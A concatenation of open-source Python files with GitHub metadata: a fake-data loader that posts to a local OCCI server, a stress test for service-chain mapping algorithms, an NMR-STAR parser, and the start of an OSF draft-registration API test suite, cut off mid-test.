c.setopt(c.POSTFIELDS, f_categories.action)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_resource():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/compute/bilel/vm01')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_entities.resource)
c.setopt(c.CUSTOMREQUEST, 'PUT')
c.perform() | {
"content_hash": "f30d8fe1d2a99ea46baf5c2414e041bd",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 100,
"avg_line_length": 29.52542372881356,
"alnum_prop": 0.6733639494833524,
"repo_name": "MarouenMechtri/CNG-Manager",
"id": "7b6ab341659cfc691ad7582a0a55bc40af770b3e",
"size": "2340",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyocni/TDD/fake_Data/initialize_fakeDB.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16023"
},
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "451189"
}
],
"symlink_target": ""
} |
"""
Generates increasingly bigger/more Service Chain requirements for a
network topology, reports how well the algorithm performed.
"""
import getopt
import logging
import math
import os
import random
import sys
import traceback
import CarrierTopoBuilder
import MappingAlgorithms
import UnifyExceptionTypes as uet
from collections import OrderedDict
from nffg_lib.nffg import NFFG, NFFGToolBox
def gen_seq():
while True:
yield int(math.floor(random.random() * 999999999))
log = logging.getLogger("StressTest")
log.setLevel(logging.WARN)
logging.basicConfig(format='%(levelname)s:%(name)s:%(message)s')
# dictionary of newly added VNF-s keyed by the number of 'test_lvl' when it
# was added.
helpmsg = """StressTest.py options are:
-h Print this message help message.
-o The output file where the result shall be printed.
--loops All Service Chains will be loops.
--fullremap Ignores all VNF mappings in the substrate network.
--vnf_sharing=p Sets the ratio of shared and not shared VNF-s.
--request_seed=i Provides seed for the random generator.
   --bw_factor=f    Controls the relative importance of bandwidth, infra
   --res_factor=f   resources and latency distance during the mapping process.
   --lat_factor=f   The factors should sum to 3; if any one is given, the
                    others must be given too!
--bt_limit=i Backtracking depth limit of the mapping algorithm (def.: 6).
--bt_br_factor=i Branching factor of the backtracking procedure of the
mapping algorithm (default is 3).
--multiple_scs One request will contain at least 2 chains with vnf sharing
probability defined by "--vnf_sharing_same_sg" option.
--vnf_sharing_same_sg=p The conditional probablilty of sharing a VNF with the
current Service Graph, if we need to share a VNF
determined by "--vnf_sharing"
--max_sc_count=i Determines how many chains should one request contain
at most.
--batch_length=f The number of time units to wait for Service Graphs, that
should be batched and mapped together by the algorithm. The
expected arrival time difference is 1.0 between SG-s.
--shareable_sg_count=i The number of last 'i' Service Graphs which could
be used for sharing VNFs. Default value is unlimited.
--sliding_share If not set, the set of shareable SG-s is emptied after
successfull batched mapping.
--use_saps_once If set, all SAPs can only be used once as SC origin and
once as SC destination.
   --poisson        Generate arrival time differences with lambda=1.0 Exponential
distribution.
--topo_name=<<gwin|picotopo>>
"""
def _shareVNFFromEarlierSG(nffg, running_nfs, nfs_this_sc, p):
sumlen = sum([l*i for l,i in zip([len(running_nfs[n]) for n in running_nfs],
xrange(1,len(running_nfs)+1))])
i = 0
ratio = float(len(running_nfs.values()[i])) / sumlen
while ratio < p:
i += 1
ratio += float((i+1)*len(running_nfs.values()[i])) / sumlen
nf = random.choice(running_nfs.values()[i])
if reduce(lambda a,b: a and b, [v in nfs_this_sc for v
in running_nfs.values()[i]]):
    # failing to add a VNF due to this criterion influences the provided
    # vnf_sharing_probabilty, but the effect is estimated to be insignificant;
    # without this check the generation could run into an infinite loop!
log.warn("All the VNF-s of the subchain selected for VNF sharing are"
" already in the current chain under construction! Skipping"
" VNF sharing...")
return False, None
else:
while nf in nfs_this_sc:
nf = random.choice(running_nfs.values()[i])
if nf in nffg.nfs:
return False, nf
else:
nffg.add_node(nf)
return True, nf
def generateRequestForCarrierTopo(test_lvl, all_saps_beginning,
all_saps_ending,
running_nfs, loops=False,
use_saps_once=True,
vnf_sharing_probabilty=0.0,
vnf_sharing_same_sg=0.0,
shareable_sg_count=9999999999999999,
multiSC=False, max_sc_count=2):
"""
By default generates VNF-disjoint SC-s starting/ending only once in each SAP.
With the 'loops' option, only loop SC-s are generated.
'vnf_sharing_probabilty' determines the ratio of
#(VNF-s used by at least two SC-s)/#(not shared VNF-s).
NOTE: some kind of periodicity is included to make the effect of batching
visible. But it is (and must be) independent of the batch_length.
  WARNING!! The meaning of batch_length changes if --poisson is set!
  Arrival times are generated exponentially to make batching more realistic:
  inter-arrival times are Exp(1), so when batching for 4 time units the
  expected SG count is 4 (the sum of 4 Exp(1) variables is Erlang with mean 4).
  BUT we wait for at least 1 SG; if by then 4 time units have already passed,
  the SG is mapped alone (unbatched).
"""
chain_maxlen = 8
sc_count=1
# maximal possible bandwidth for chains
max_bw = 7.0
if multiSC:
sc_count = random.randint(2,max_sc_count)
while len(all_saps_ending) > sc_count and len(all_saps_beginning) > sc_count:
nffg = NFFG(id="Benchmark-Req-"+str(test_lvl)+"-Piece")
# newly added NF-s of one request
current_nfs = []
for scid in xrange(0,sc_count):
# find two SAP-s for chain ends.
nfs_this_sc = []
sap1 = nffg.add_sap(id = all_saps_beginning.pop() if use_saps_once else \
random.choice(all_saps_beginning))
sap2 = None
if loops:
sap2 = sap1
else:
tmpid = all_saps_ending.pop() if use_saps_once else \
random.choice(all_saps_ending)
while True:
if tmpid != sap1.id:
sap2 = nffg.add_sap(id = tmpid)
break
else:
tmpid = all_saps_ending.pop() if use_saps_once else \
random.choice(all_saps_ending)
sg_path = []
sap1port = sap1.add_port()
last_req_port = sap1port
# generate some VNF-s connecting the two SAP-s
vnf_cnt = next(gen_seq()) % chain_maxlen + 1
for vnf in xrange(0, vnf_cnt):
# in the first case p is used to determine which previous chain should
# be used to share the VNF, in the latter case it is used to determine
# whether we should share now.
vnf_added = False
p = random.random()
if random.random() < vnf_sharing_probabilty and len(running_nfs) > 0 \
and not multiSC:
vnf_added, nf = _shareVNFFromEarlierSG(nffg, running_nfs, nfs_this_sc,
p)
elif multiSC and \
p < vnf_sharing_probabilty and len(current_nfs) > 0 \
and len(running_nfs) > 0:
          # this influences the given VNF sharing probability...
if reduce(lambda a,b: a and b, [v in nfs_this_sc for
v in current_nfs]):
log.warn("All shareable VNF-s are already added to this chain! "
"Skipping VNF sharing...")
elif random.random() < vnf_sharing_same_sg:
nf = random.choice(current_nfs)
while nf in nfs_this_sc:
nf = random.choice(current_nfs)
# the VNF is already in the subchain, we just need to add the links
# vnf_added = True
else:
# this happens when VNF sharing is needed but not with the actual SG
vnf_added, nf = _shareVNFFromEarlierSG(nffg, running_nfs,
nfs_this_sc, p)
else:
nf = nffg.add_nf(id="-".join(("Test",str(test_lvl),"SC",str(scid),
"VNF",str(vnf))),
func_type=random.choice(['A','B','C']),
cpu=random.randint(1 + (2 if test_lvl%4 == 3 else 0),
4 + (6 if test_lvl%4 == 3 else 0)),
mem=random.random()*1000 + \
(1000 if test_lvl%4 > 1 else 0),
storage=random.random()*3 + \
(6 if test_lvl%4 > 1 else 0),
delay=1 + random.random()*10,
bandwidth=random.random())
vnf_added = True
if vnf_added:
# add olny the newly added VNF-s, not the shared ones.
nfs_this_sc.append(nf)
newport = nf.add_port()
sglink = nffg.add_sglink(last_req_port, newport)
sg_path.append(sglink.id)
last_req_port = nf.add_port()
sap2port = sap2.add_port()
sglink = nffg.add_sglink(last_req_port, sap2port)
sg_path.append(sglink.id)
      # WARNING: this is completely a wild guess! Failing due to this doesn't
# necessarily mean algorithm failure
# Bandwidth maximal random value should be min(SAP1acces_bw, SAP2access_bw)
      # MAYBE: each SAP can only be used once in the reqgraph? - this is the case now.
if multiSC:
minlat = 5.0 * (len(nfs_this_sc) + 2)
maxlat = 13.0 * (len(nfs_this_sc) + 2)
else:
# nfcnt = len([i for i in nffg.nfs])
minlat = 45.0 - 10.0*(test_lvl%4)
maxlat = 60.0 - 12.25*(test_lvl%4)
nffg.add_req(sap1port, sap2port, delay=random.uniform(minlat,maxlat),
bandwidth=random.random()*(max_bw + test_lvl%4),
sg_path = sg_path)
log.info("Service Chain on NF-s added: %s"%[nf.id for nf in nfs_this_sc])
# this prevents loops in the chains and makes new and old NF-s equally
# preferable in total for NF sharing
new_nfs = [vnf for vnf in nfs_this_sc if vnf not in current_nfs]
for tmp in xrange(0, scid+1):
current_nfs.extend(new_nfs)
if not multiSC:
return nffg, all_saps_beginning, all_saps_ending
if multiSC:
return nffg, all_saps_beginning, all_saps_ending
return None, all_saps_beginning, all_saps_ending
def StressTestCore(seed, loops, use_saps_once, vnf_sharing, multiple_scs,
max_sc_count, vnf_sharing_same_sg, fullremap,
batch_length, shareable_sg_count, sliding_share, poisson,
topo_name,
bw_factor, res_factor, lat_factor, bt_limit, bt_br_factor,
outputfile, queue=None, shortest_paths_precalc=None,
filehandler=None):
"""
If queue is given, the result will be put in that Queue object too. Meanwhile
if shortest_paths_precalc is not given, it means the caller needs the
shortest_paths, so we send it back. In this case the resulting test_lvl will
be sent by the queue.
NOTE: outputfile is only used inside the function if an exception is thrown
  and then it is logged there.
"""
total_vnf_count = 0
mapped_vnf_count = 0
network = None
if topo_name == "picotopo":
network = CarrierTopoBuilder.getPicoTopo()
elif topo_name == "gwin":
network = CarrierTopoBuilder.getSNDlib_dfn_gwin(save_to_file=True)
max_test_lvl = 50000
test_lvl = 1
all_saps_ending = [s.id for s in network.saps]
all_saps_beginning = [s.id for s in network.saps]
running_nfs = OrderedDict()
random.seed(0)
random.jumpahead(seed)
random.shuffle(all_saps_beginning)
random.shuffle(all_saps_ending)
shortest_paths = shortest_paths_precalc
ppid_pid = ""
# log.addHandler(logging.StreamHandler())
log.setLevel(logging.WARN)
if filehandler is not None:
log.addHandler(filehandler)
if shortest_paths is not None and type(shortest_paths) != dict:
excp = Exception("StressTest received something else other than shortest_"
"paths dictionary: %s"%type(shortest_paths))
if queue is not None:
queue.put(excp)
raise excp
if queue is not None:
ppid_pid = "%s.%s:"%(os.getppid(), os.getpid())
try:
try:
batch_count = 0
batched_request = NFFG(id="Benchmark-Req-"+str(test_lvl))
# built-in libs can change the state of random module during mapping.
random_state = None
while batched_request is not None:
if test_lvl > max_test_lvl:
break
if (len(all_saps_ending) < batch_length or \
len(all_saps_beginning) < batch_length) and use_saps_once:
log.warn("Can't start batching because all SAPs should only be used"
" once for SC origin and destination and there are not "
"enough SAPs!")
batched_request = None
elif batch_count < batch_length or len([nf for nf in request.nfs]) == 0:
request, all_saps_beginning, all_saps_ending = \
generateRequestForCarrierTopo(test_lvl, all_saps_beginning,
all_saps_ending, running_nfs,
loops=loops, use_saps_once=use_saps_once,
vnf_sharing_probabilty=vnf_sharing,
vnf_sharing_same_sg=vnf_sharing_same_sg,
multiSC=multiple_scs, max_sc_count=max_sc_count)
if request is None:
break
else:
batch_count += (random.expovariate(1.0) if poisson else 1)
if poisson:
log.debug("Time passed since last batched mapping: %s"%
batch_count)
running_nfs[test_lvl] = [nf for nf in request.nfs
if nf.id.split("-")[1] == str(test_lvl)]
# using merge to create the union of the NFFG-s!
batched_request = NFFGToolBox.merge_nffgs(batched_request,
request)
if len(running_nfs) > shareable_sg_count:
# make the ordered dict function as FIFO
running_nfs.popitem(last=False)
test_lvl += 1
if not sliding_share and test_lvl % shareable_sg_count == 0:
running_nfs = OrderedDict()
log.debug("Batching Service Graph number %s..."%batch_count)
else:
batch_count = 0
total_vnf_count += len([nf for nf in batched_request.nfs])
random_state = random.getstate()
network, shortest_paths = MappingAlgorithms.MAP(batched_request, network,
full_remap=fullremap, enable_shortest_path_cache=True,
bw_factor=bw_factor, res_factor=res_factor,
lat_factor=lat_factor, shortest_paths=shortest_paths,
return_dist=True,
bt_limit=bt_limit, bt_branching_factor=bt_br_factor)
log.debug(ppid_pid+"Mapping successful on test level %s with batch"
" length %s!"%(test_lvl, batch_length))
random.setstate(random_state)
mapped_vnf_count += len([nf for nf in batched_request.nfs])
batched_request = NFFG(id="Benchmark-Req-"+str(test_lvl))
except uet.MappingException as me:
log.info(ppid_pid+"Mapping failed: %s"%me.msg)
if not me.backtrack_possible:
        # NOTE: peak SC count is only correct to add to test_lvl if SC-s are
# disjoint on VNFs.
if poisson:
log.warn("Peak mapped VNF count is %s in the last run, test level: "
"UNKNOWN because of Poisson"%me.peak_mapped_vnf_count)
else:
log.warn("Peak mapped VNF count is %s in the last run, test level: %s"%
(me.peak_mapped_vnf_count,
test_lvl - batch_length + \
(me.peak_sc_cnt if me.peak_sc_cnt is not None else 0)))
mapped_vnf_count += me.peak_mapped_vnf_count
log.warn("All-time peak mapped VNF count: %s, All-time total VNF "
"count %s, Acceptance ratio: %s"%(mapped_vnf_count,
total_vnf_count, float(mapped_vnf_count)/total_vnf_count))
# break
if request is None or batched_request is None:
log.warn(ppid_pid+"Request generation reached its end!")
# break
except uet.UnifyException as ue:
log.error(ppid_pid+ue.msg)
log.error(ppid_pid+traceback.format_exc())
with open(outputfile, "a") as f:
f.write("\n".join(("UnifyException cought during StressTest: ",
ue.msg,traceback.format_exc())))
if queue is not None:
queue.put(str(ue.__class__))
return test_lvl-1
except Exception as e:
log.error(ppid_pid+traceback.format_exc())
with open(outputfile, "a") as f:
f.write("\n".join(("Exception cought during StressTest: ",
traceback.format_exc())))
if queue is not None:
queue.put(str(e.__class__))
return test_lvl-1
# put the result to the queue
if queue is not None:
log.info(ppid_pid+"Putting %s to communication queue"%(test_lvl-1))
queue.put(test_lvl-1)
if shortest_paths_precalc is None:
log.info(ppid_pid+"Returning shortest_paths!")
return shortest_paths
# if returned_test_lvl is 0, we failed at the very first mapping!
return test_lvl-1
def main(argv):
try:
opts, args = getopt.getopt(argv,"ho:",["loops", "fullremap", "bw_factor=",
"res_factor=", "lat_factor=", "request_seed=",
"vnf_sharing=", "multiple_scs", "poisson",
"vnf_sharing_same_sg=", "max_sc_count=",
"shareable_sg_count=", "batch_length=",
"bt_br_factor=", "bt_limit=",
"sliding_share", "use_saps_once",
"topo_name="])
except getopt.GetoptError:
print helpmsg
sys.exit()
loops = False
fullremap = False
vnf_sharing = 0.0
vnf_sharing_same_sg = 0.0
seed = 3
bw_factor = 1
res_factor = 1
lat_factor = 1
outputfile = "paramsearch.out"
multiple_scs = False
sliding_share = False
use_saps_once = False
poisson = False
max_sc_count = 2
shareable_sg_count = 99999999999999
batch_length = 1
bt_br_factor = 6
bt_limit = 3
topo_name = "picotopo"
for opt, arg in opts:
if opt == '-h':
print helpmsg
sys.exit()
elif opt == '-o':
outputfile = arg
elif opt == "--loops":
loops = True
elif opt == "--fullremap":
fullremap = True
elif opt == "--request_seed":
seed = int(arg)
elif opt == "--vnf_sharing":
vnf_sharing = float(arg)
elif opt == "--bw_factor":
bw_factor = float(arg)
elif opt == "--res_factor":
res_factor = float(arg)
elif opt == "--lat_factor":
lat_factor = float(arg)
elif opt == "--multiple_scs":
multiple_scs = True
elif opt == "--max_sc_count":
max_sc_count = int(arg)
elif opt == "--vnf_sharing_same_sg":
vnf_sharing_same_sg = float(arg)
elif opt == "--shareable_sg_count":
shareable_sg_count = int(arg)
elif opt == "--batch_length":
batch_length = float(arg)
elif opt == "--sliding_share":
sliding_share = True
elif opt == "--use_saps_once":
use_saps_once = True
elif opt == "--bt_limit":
bt_limit = int(arg)
elif opt == "--bt_br_factor":
bt_br_factor = int(arg)
elif opt == "--poisson":
poisson = True
elif opt == "--topo_name":
topo_name = arg
params, args = zip(*opts)
if "--bw_factor" not in params or "--res_factor" not in params or \
"--lat_factor" not in params:
print helpmsg
raise Exception("Not all algorithm params are given!")
returned_test_lvl = StressTestCore(seed, loops, use_saps_once, vnf_sharing,
multiple_scs, max_sc_count, vnf_sharing_same_sg, fullremap,
batch_length, shareable_sg_count, sliding_share, poisson, topo_name,
bw_factor, res_factor, lat_factor, bt_limit, bt_br_factor, outputfile)
log.info("First unsuccessful mapping was at %s test level."%
(returned_test_lvl+1))
if returned_test_lvl > 0:
with open(outputfile, "a") as f:
f.write("\nLast successful mapping was at %s test level.\n"%
(returned_test_lvl))
else:
with open(outputfile, "a") as f:
f.write("\nMapping failed at starting test level (%s)\n"%(returned_test_lvl+1))
if __name__ == '__main__':
main(sys.argv[1:])
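# Example invocation (illustrative parameter values; the three *_factor
# options are mandatory, see the check in main()):
#   python StressTest-sc8decent.py --bw_factor=1 --res_factor=1 --lat_factor=1 \
#     --request_seed=5 --batch_length=4 --topo_name=picotopo -o results.out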
| {
"content_hash": "cd8cf872695fe0a9690e2de5f6477f36",
"timestamp": "",
"source": "github",
"line_count": 486,
"max_line_length": 87,
"avg_line_length": 42.74485596707819,
"alnum_prop": 0.583902955617599,
"repo_name": "hsnlab/mapping",
"id": "209f766bd9e7184296b487183ba5265a4acd37f1",
"size": "21349",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "alg1/utils/StressTest-sc8decent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Game Maker Language",
"bytes": "14294"
},
{
"name": "Python",
"bytes": "760651"
},
{
"name": "Roff",
"bytes": "73"
},
{
"name": "Shell",
"bytes": "871"
}
],
"symlink_target": ""
} |
from nmrpystar import starast
from nmrpystar.unparse.maybeerror import MaybeError
class Loop(starast.StarBase):
def __init__(self, keys, rows):
if not isinstance(keys, list):
raise TypeError('Loop needs list of keys')
if len(keys) != len(set(keys)):
raise ValueError('Loop requires unique keys')
if not isinstance(rows, list):
raise TypeError('Loop needs list of rows')
for r in rows:
if not isinstance(r, list):
raise TypeError('Loop rows must be lists')
if len(r) != len(keys):
raise ValueError('Loop row: %i keys, but %i values' % (len(keys), len(r)))
self.keys = keys
self.rows = rows
def toJSONObject(self):
return {'type': 'Loop',
'keys': self.keys,
'rows': self.rows}
def getRowAsDict(self, rowIndex):
return dict(zip(self.keys, self.rows[rowIndex]))
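# A minimal usage sketch for Loop (hypothetical data, not tied to any schema):
#   loop = Loop(['id', 'shift'], [['1', '8.2'], ['2', '7.9']])
#   loop.getRowAsDict(0)  ->  {'id': '1', 'shift': '8.2'}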
class Save(starast.StarBase):
def __init__(self, prefix, category, datums, loops):
if not isinstance(datums, dict):
raise TypeError('saveframe datums must be a dict')
if not isinstance(loops, dict):
raise TypeError('saveframe loops must be a dict')
self.prefix = prefix
self.category = category
self.datums = datums
self.loops = loops
def toJSONObject(self):
loops = dict([(name, loop.toJSONObject()) for (name, loop) in self.loops.items()])
return {'type' : 'Save',
'datums' : self.datums,
'prefix' : self.prefix,
'category' : self.category,
'loops' : loops}
class Data(starast.StarBase):
def __init__(self, name, saves):
self.name = name
if not isinstance(saves, dict):
raise TypeError(('save frames must be a dict', saves, type(saves)))
self.saves = saves
def toJSONObject(self):
return {'type' : 'Data',
'name' : self.name,
'save frames': dict((k, s.toJSONObject()) for (k, s) in self.saves.items())}
class ASTError(ValueError):
def __init__(self, error):
self.error = error
def __repr__(self):
return repr({'type': 'ASTError', 'error': self.error})
def __str__(self):
return repr(self)
def bad(**kwargs):
raise ASTError(kwargs)
def parse_ident(string):
"""
yes:
abc.def
Assigned_chem_shift.ID
no:
abc
.abc
abc.
.
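Illustrative results (matching the checks below):
parse_ident('abc.def') -> ('abc', 'def')
parse_ident('Assigned_chem_shift.ID') -> ('Assigned_chem_shift', 'ID')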
"""
dot_index = string.find('.')
if dot_index == -1:
bad(nodetype='identifier', message='missing prefix', key=string)
elif dot_index == 0:
bad(nodetype='identifier', message='invalid empty prefix', key=string)
elif dot_index == len(string) - 1:
bad(nodetype='identifier', message='invalid key postfix', key=string)
return (string[:dot_index], string[dot_index+1:])
def build_loop(loop):
'''
ASTLoop -> (String, NMRSTAR-ASTLoop)
0. 1+ keys
1. consistent key prefix
'''
# 0. 1+ keys
if len(loop.keys) == 0:
bad(nodetype='loop', message='0 keys', loop=loop)
prefixes, keys = set([]), []
for node in loop.keys:
pre, key = parse_ident(node)
prefixes.add(pre)
keys.append(key)
# 1. consistent key prefix
if len(prefixes) != 1:
bad(nodetype='loop', message='inconsistent loop prefix',
prefixes=prefixes)
prefix = list(prefixes)[0]
return (prefix, Loop(keys, loop.rows))
def build_save(name, save):
'''
0. 1+ keys
1. consistent key prefixes
2. presence of Sf_framecode and Sf_category keys
3. matching of Sf_framecode value to save frame name
4. duplicate loop prefixes
'''
loops, datums = {}, {}
# 0.
if len(save.datums) == 0:
bad(nodetype='save', message='missing key/values', save=save)
prefixes = set([])
for (ident, value) in save.datums.items():
pre, key = parse_ident(ident)
prefixes.add(pre)
datums[key] = value
# 1.
if len(prefixes) != 1:
bad(nodetype='save', message='inconsistent prefixes',
prefixes=prefixes)
prefix = list(prefixes)[0]
# 2.
for required_key in ['Sf_framecode', 'Sf_category']:
# TODO what about Entry_ID and ID?
if required_key not in datums:
mess = 'missing key "%s"' % required_key
bad(nodetype='save', message=mess)
# 3.
fcode = datums.pop('Sf_framecode')
if fcode != name:
bad(nodetype='save', expected=name, actual=fcode,
message='Sf_framecode does not match save frame name')
category = datums.pop('Sf_category')
# 4.
for my_loop in save.loops:
(loop_prefix, loop) = build_loop(my_loop)
if loop_prefix in loops:
bad(nodetype='save', message='duplicate loop prefix',
prefix=loop_prefix)
loops[loop_prefix] = loop
return Save(prefix, category, datums, loops)
def build_data(data):
saves = {}
for (name, my_save) in data.saves.items():
save = build_save(name, my_save)
saves[name] = save
return Data(data.name, saves)
def build_nmrstar_ast(data):
if not isinstance(data, starast.Data):
raise TypeError(("expected starast.Data node", data))
try:
return MaybeError.pure(build_data(data))
except ASTError as e:
return MaybeError.error(e.error)
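# A rough end-to-end sketch (assumes `data` is a parsed starast.Data node):
#   result = build_nmrstar_ast(data)
#   `result` is a MaybeError wrapping either the converted Data or an error dict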
| {
"content_hash": "a45892b7ff6714f4576f49ed4b254840",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 92,
"avg_line_length": 28.685567010309278,
"alnum_prop": 0.568733153638814,
"repo_name": "mattfenwick/NMRPyStar",
"id": "1933bcfef402bb8b4afa50d80e5253717392b2d3",
"size": "5565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nmrpystar/nmrstarast.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63036"
},
{
"name": "Shell",
"bytes": "364"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from osf.models import MetaSchema
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
CollectionFactory,
DraftRegistrationFactory,
)
from website.project.metadata.schemas import LATEST_SCHEMA_VERSION
from website.project.metadata.utils import create_jsonschema_from_metaschema
from website.settings import PREREG_ADMIN_TAG
from website.util import permissions
@pytest.mark.django_db
class DraftRegistrationTestCase:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def user_write_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_read_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_non_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def project_public(self, user, user_write_contrib, user_read_contrib):
project_public = ProjectFactory(is_public=True, creator=user)
project_public.add_contributor(user_write_contrib, permissions=[permissions.WRITE])
project_public.add_contributor(user_read_contrib, permissions=[permissions.READ])
project_public.save()
return project_public
@pytest.fixture()
def prereg_metadata(self):
def metadata(draft):
test_metadata = {}
json_schema = create_jsonschema_from_metaschema(draft.registration_schema.schema)
for key, value in json_schema['properties'].iteritems():
response = 'Test response'
if value['properties']['value'].get('enum'):
response = value['properties']['value']['enum'][0]
if value['properties']['value'].get('properties'):
response = {'question': {'value': 'Test Response'}}
test_metadata[key] = {'value': response}
return test_metadata
return metadata
@pytest.mark.django_db
class TestDraftRegistrationList(DraftRegistrationTestCase):
@pytest.fixture()
def schema(self):
return MetaSchema.objects.get(name='Open-Ended Registration', schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def draft_registration(self, user, project_public, schema):
return DraftRegistrationFactory(
initiator=user,
registration_schema=schema,
branched_from=project_public
)
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(API_BASE, project_public._id)
def test_admin_can_view_draft_list(self, app, user, draft_registration, schema, url_draft_registrations):
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
def test_cannot_view_draft_list(self, app, user_write_contrib, user_read_contrib, user_non_contrib, url_draft_registrations):
# test_read_only_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_read_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_read_write_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_write_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_logged_in_non_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_non_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_unauthenticated_user_cannot_view_draft_list
res = app.get(url_draft_registrations, expect_errors=True)
assert res.status_code == 401
def test_draft_with_registered_node_does_not_show_up_in_draft_list(self, app, user, project_public, draft_registration, url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_deleted_registered_node_shows_up_in_draft_list(self, app, user, project_public, draft_registration, schema, url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
reg.is_deleted = True
reg.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
@pytest.mark.django_db
class TestDraftRegistrationCreate(DraftRegistrationTestCase):
@pytest.fixture()
def metaschema_open_ended(self):
return MetaSchema.objects.get(name='Open-Ended Registration', schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def payload(self, metaschema_open_ended):
return {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(API_BASE, project_public._id)
def test_type_is_draft_registrations(self, app, user, metaschema_open_ended, url_draft_registrations):
draft_data = {
'data': {
'type': 'nodes',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 409
def test_admin_can_create_draft(self, app, user, project_public, payload, metaschema_open_ended):
url = '/{}nodes/{}/draft_registrations/?embed=branched_from&embed=initiator'.format(API_BASE, project_public._id)
res = app.post_json_api(url, payload, auth=user.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['registration_supplement'] == metaschema_open_ended._id
assert data['attributes']['registration_metadata'] == {}
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_cannot_create_draft(self, app, user_write_contrib, user_read_contrib, user_non_contrib, project_public, payload, url_draft_registrations):
# test_write_only_contributor_cannot_create_draft
assert user_write_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user_write_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_read_only_contributor_cannot_create_draft
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user_read_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_non_authenticated_user_cannot_create_draft
res = app.post_json_api(url_draft_registrations, payload, expect_errors=True)
assert res.status_code == 401
# test_logged_in_non_contributor_cannot_create_draft
res = app.post_json_api(url_draft_registrations, payload, auth=user_non_contrib.auth, expect_errors=True)
assert res.status_code == 403
def test_registration_supplement_errors(self, app, user, url_draft_registrations):
# test_registration_supplement_not_found
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': 'Invalid schema'
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 404
# test_registration_supplement_must_be_active_metaschema
schema = MetaSchema.objects.get(name='Election Research Preacceptance Competition', active=False)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
# test_registration_supplement_must_be_most_recent_metaschema
schema = MetaSchema.objects.get(name='Open-Ended Registration', schema_version=1)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
def test_cannot_create_draft_errors(self, app, user, project_public, payload):
# test_cannot_create_draft_from_a_registration
registration = RegistrationFactory(project=project_public, creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(API_BASE, registration._id)
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 404
# test_cannot_create_draft_from_deleted_node
project = ProjectFactory(is_public=True, creator=user)
project.is_deleted = True
project.save()
url_project = '/{}nodes/{}/draft_registrations/'.format(API_BASE, project._id)
res = app.post_json_api(url_project, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 410
assert res.json['errors'][0]['detail'] == 'The requested node is no longer available.'
# test_cannot_create_draft_from_collection
collection = CollectionFactory(creator=user)
